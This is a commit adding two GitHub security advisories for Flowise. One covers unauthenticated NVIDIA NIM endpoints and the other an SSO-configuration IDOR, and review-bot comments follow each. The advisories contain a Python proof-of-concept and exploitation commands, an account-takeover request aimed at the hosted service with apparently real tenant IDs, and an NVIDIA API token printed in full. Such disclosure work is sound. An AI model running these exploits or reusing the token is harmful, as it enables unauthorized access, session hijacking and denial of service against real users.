Commit f9bbaa3

1 parent 09b88bc commit f9bbaa3

2 files changed

Lines changed: 121 additions & 0 deletions

Lines changed: 60 additions & 0 deletions
@@ -0,0 +1,60 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-5f53-522j-j454",
4+
"modified": "2026-03-06T22:21:38Z",
5+
"published": "2026-03-06T22:21:38Z",
6+
"aliases": [
7+
"CVE-2026-30824"
8+
],
9+
"summary": "Flowise Missing Authentication on NVIDIA NIM Endpoints",
10+
"details": "# Missing Authentication on NVIDIA NIM Endpoints\n\n## Summary\n\nThe NVIDIA NIM router (`/api/v1/nvidia-nim/*`) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.\n\n## Vulnerability Details\n\n| Field | Value |\n|-------|-------|\n| CWE | CWE-306: Missing Authentication for Critical Function |\n| Affected File | `packages/server/src/utils/constants.ts` |\n| Affected Line | Line 20 (`'/api/v1/nvidia-nim'` in `WHITELIST_URLS`) |\n| CVSS 3.1 | 8.6 (High) |\n\n## Root Cause\n\nIn `packages/server/src/utils/constants.ts`, the NVIDIA NIM route is added to the authentication whitelist:\n\n```typescript\nexport const WHITELIST_URLS = [\n // ... other URLs\n '/api/v1/nvidia-nim', // Line 20 - bypasses JWT/API-key validation\n // ...\n]\n```\n\nThis causes the global auth middleware to skip authentication checks for all endpoints under `/api/v1/nvidia-nim/*`. None of the controller actions in `packages/server/src/controllers/nvidia-nim/index.ts` perform their own authentication checks.\n\n## Affected Endpoints\n\n| Method | Endpoint | Risk |\n|--------|----------|------|\n| GET | `/api/v1/nvidia-nim/get-token` | Leaks valid NVIDIA API token |\n| GET | `/api/v1/nvidia-nim/preload` | Resource consumption |\n| GET | `/api/v1/nvidia-nim/download-installer` | Resource consumption |\n| GET | `/api/v1/nvidia-nim/list-running-containers` | Information disclosure |\n| POST | `/api/v1/nvidia-nim/pull-image` | Arbitrary image pull |\n| POST | `/api/v1/nvidia-nim/start-container` | Arbitrary container start |\n| POST | `/api/v1/nvidia-nim/stop-container` | Denial of Service |\n| POST | `/api/v1/nvidia-nim/get-image` | Information disclosure |\n| POST | `/api/v1/nvidia-nim/get-container` | Information disclosure |\n\n## Impact\n\n### 1. NVIDIA API Token Leakage\n\nThe `/get-token` endpoint returns a valid NVIDIA API token without authentication. 
This token grants access to NVIDIA's inference API and can list 170+ LLM models.\n\n**Token obtained:**\n```json\n{\n \"access_token\": \"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\",\n \"token_type\": \"Bearer\",\n \"expires_in\": 3600\n}\n```\n\n**Token validation:**\n```bash\ncurl -H \"Authorization: Bearer nvapi-GT-...\" https://integrate.api.nvidia.com/v1/models\n# Returns list of 170+ available models\n```\n\n### 2. Container Runtime Manipulation\n\nOn systems with Docker/NIM installed, an unauthenticated attacker can:\n- List running containers (reconnaissance)\n- Stop containers (Denial of Service)\n- Start containers with arbitrary images\n- Pull arbitrary Docker images (resource consumption, potential malicious images)\n\n## Proof of Concept\n\n### poc.py\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPOC: Privileged NVIDIA NIM endpoints are unauthenticated\n\nUsage:\n python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token\n\"\"\"\n\nimport argparse\nimport urllib.request\nimport urllib.error\n\ndef main():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"--target\", required=True, help=\"Base URL, e.g. 
http://host:port\")\n ap.add_argument(\"--path\", required=True, help=\"NIM endpoint path\")\n ap.add_argument(\"--method\", default=\"GET\", choices=[\"GET\", \"POST\"])\n ap.add_argument(\"--data\", default=\"\", help=\"Raw request body for POST\")\n args = ap.parse_args()\n\n url = args.target.rstrip(\"/\") + \"/\" + args.path.lstrip(\"/\")\n body = args.data.encode(\"utf-8\") if args.method == \"POST\" else None\n req = urllib.request.Request(\n url,\n data=body,\n method=args.method,\n headers={\"Content-Type\": \"application/json\"} if body else {},\n )\n\n try:\n with urllib.request.urlopen(req, timeout=10) as r:\n print(r.read().decode(\"utf-8\", errors=\"replace\"))\n except urllib.error.HTTPError as e:\n print(e.read().decode(\"utf-8\", errors=\"replace\"))\n\nif __name__ == \"__main__\":\n main()\n```\n\n<img width=\"1581\" height=\"595\" alt=\"screenshot\" src=\"https://github.com/user-attachments/assets/85351a88-64ce-4e2c-8e67-98f217fcf989\" />\n\n### Exploitation Steps\n\n```bash\n# 1. Obtain NVIDIA API token (no authentication required)\npython poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token\n\n# 2. List running containers\npython poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers\n\n# 3. Stop a container (DoS)\npython poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \\\n --method POST --data '{\"containerId\":\"<target_id>\"}'\n\n# 4. 
Pull arbitrary image\npython poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \\\n --method POST --data '{\"imageTag\":\"malicious/image\",\"apiKey\":\"any\"}'\n```\n\n### Evidence\n\n**Token retrieval without authentication:**\n```\n$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token\n{\"access_token\":\"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\",\"token_type\":\"Bearer\",\"refresh_token\":null,\"expires_in\":3600,\"id_token\":null}\n```\n\n**Token grants access to NVIDIA API:**\n```\n$ curl -H \"Authorization: Bearer nvapi-GT-...\" https://integrate.api.nvidia.com/v1/models\n{\"object\":\"list\",\"data\":[{\"id\":\"01-ai/yi-large\",...},{\"id\":\"meta/llama-3.1-405b-instruct\",...},...]}\n```\n\n**Container endpoints return 500 (not 401) proving auth bypass:**\n```\n$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers\n{\"statusCode\":500,\"success\":false,\"message\":\"Container runtime client not available\",\"stack\":{}}\n```\n\n## References\n\n- [CWE-306: Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html)\n- [OWASP API Security Top 10 - API2:2023 Broken Authentication](https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/)",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "flowise"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "3.0.13"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 3.0.12"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/FlowiseAI/Flowise"
49+
}
50+
],
51+
"database_specific": {
52+
"cwe_ids": [
53+
"CWE-306"
54+
],
55+
"severity": "HIGH",
56+
"github_reviewed": true,
57+
"github_reviewed_at": "2026-03-06T22:21:38Z",
58+
"nvd_published_at": null
59+
}
60+
}
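Review bot: The `details` string for GHSA-5f53-522j-j454 embeds what is presented as a valid NVIDIA API token in full, once under "Token obtained" and again in the "Evidence" output, while the curl examples in the same field already abbreviate it as `nvapi-GT-...`. Redact both full occurrences to the abbreviated form before publishing, and confirm with the reporter that the credential has been revoked, since the advisory itself states it grants access to NVIDIA's inference API. Separately, the severity data is inconsistent within the record: the details table gives "CVSS 3.1 | 8.6 (High)", but the `severity` array carries only a `CVSS_V4` vector with `VC:N/VI:N/VA:N/SC:H/SI:N/SA:N`, which scores no impact on the Flowise host even though the Affected Endpoints table lists `stop-container` as Denial of Service and `start-container` as arbitrary container start. Either add the matching `CVSS_V3` entry or note in the details why the v4 vector is limited to subsequent-system confidentiality.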
Lines changed: 61 additions & 0 deletions
@@ -0,0 +1,61 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-cwc3-p92j-g7qm",
4+
"modified": "2026-03-06T22:20:50Z",
5+
"published": "2026-03-06T22:20:50Z",
6+
"aliases": [
7+
"CVE-2026-30823"
8+
],
9+
"summary": "Flowise has IDOR leading to Account Takeover and Enterprise Feature Bypass via SSO Configuration",
10+
"details": "### Summary\nThe Flowise platform has a critical Insecure Direct Object Reference (IDOR) vulnerability combined with a Business Logic Flaw in the PUT /api/v1/loginmethod endpoint.\n\nWhile the endpoint requires authentication, it fails to validate if the authenticated user has ownership or administrative rights over the target organizationId. This allows any low-privileged user (including \"Free\" plan users) to:\n\n1. Overwrite the SSO configuration of any other organization.\n2. Enable \"Enterprise-only\" features (SSO/SAML) without a license.\n3. Perform Account Takeover by redirecting the authentication flow.\n\n### Details\nThe backend accepts the organizationId parameter from the JSON body and updates the database record corresponding to that ID. There is no middleware or logic check to ensure request.user.organizationId === body.organizationId.\n\n### PoC\nPrerequisites:\n1. The attacker creates a standard \"Free\" account and obtains a valid JWT token (Cookie/Header).\n2. 
The attacker identifies the target organizationId (e.g., bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d).\n\n**Step-by-Step Exploitation**: The attacker sends the following PUT request to overwrite the victim's Google SSO configuration.\n\n**Request**:\n\n```http\nPUT /api/v1/loginmethod HTTP/2\nHost: cloud.flowiseai.com\nCookie: token=<ATTACKER_JWT_TOKEN>\nContent-Type: application/json\nAccept: application/json\n\n{\n \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n \"userId\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\", \n \"providers\": [\n {\n \"providerLabel\": \"Google\",\n \"providerName\": \"google\",\n \"config\": {\n \"clientID\": \"ATTACKER_MALICIOUS_CLIENT_ID\",\n \"clientSecret\": \"ATTACKER_MALICIOUS_SECRET\"\n },\n \"status\": \"enable\"\n }\n ]\n}\n```\n\n**Response**: The server responds with 200 OK, confirming the modification has been applied to the victim's organization context.\n\n```json\n{\n \"status\": \"OK\",\n \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\"\n}\n```\n\n### Impact\n\n- **Account Takeover**: An attacker can replace a victim organization's legitimate OAuth credentials (e.g., Google Client ID) with their own malicious application credentials. When victim employees try to log in via SSO, they are authenticated against the attacker's application, potentially allowing the attacker to hijack sessions or steal credentials.\n- **License Control Bypass**: Users on the \"Free\" tier can illicitly enable and configure SSO providers (Azure, Okta, etc.), which are features strictly restricted to the \"Enterprise\" plan.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "flowise"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "3.0.13"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 3.0.12"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/FlowiseAI/Flowise"
49+
}
50+
],
51+
"database_specific": {
52+
"cwe_ids": [
53+
"CWE-639",
54+
"CWE-862"
55+
],
56+
"severity": "HIGH",
57+
"github_reviewed": true,
58+
"github_reviewed_at": "2026-03-06T22:20:50Z",
59+
"nvd_published_at": null
60+
}
61+
}
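Review bot: The PoC request in the `details` string for GHSA-cwc3-p92j-g7qm targets `Host: cloud.flowiseai.com` and carries a concrete `organizationId` (repeated in the prerequisites and the response) and `userId`, while the cookie and client credentials in the same request are already placeholders such as `<ATTACKER_JWT_TOKEN>`. If those UUIDs belong to a real tenant, replace them with labelled placeholders in the same style so the published record does not identify an organization on the hosted service. Also check the vector in `severity`: it sets `A:H`, but the Impact section describes only account takeover and license bypass, with no availability loss stated, so either justify the availability rating in the details or lower it. The `references` array has no entry pointing at the fix, although `"fixed": "3.0.13"` is declared; a link to the fixing change or release would let consumers verify the fixed range.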
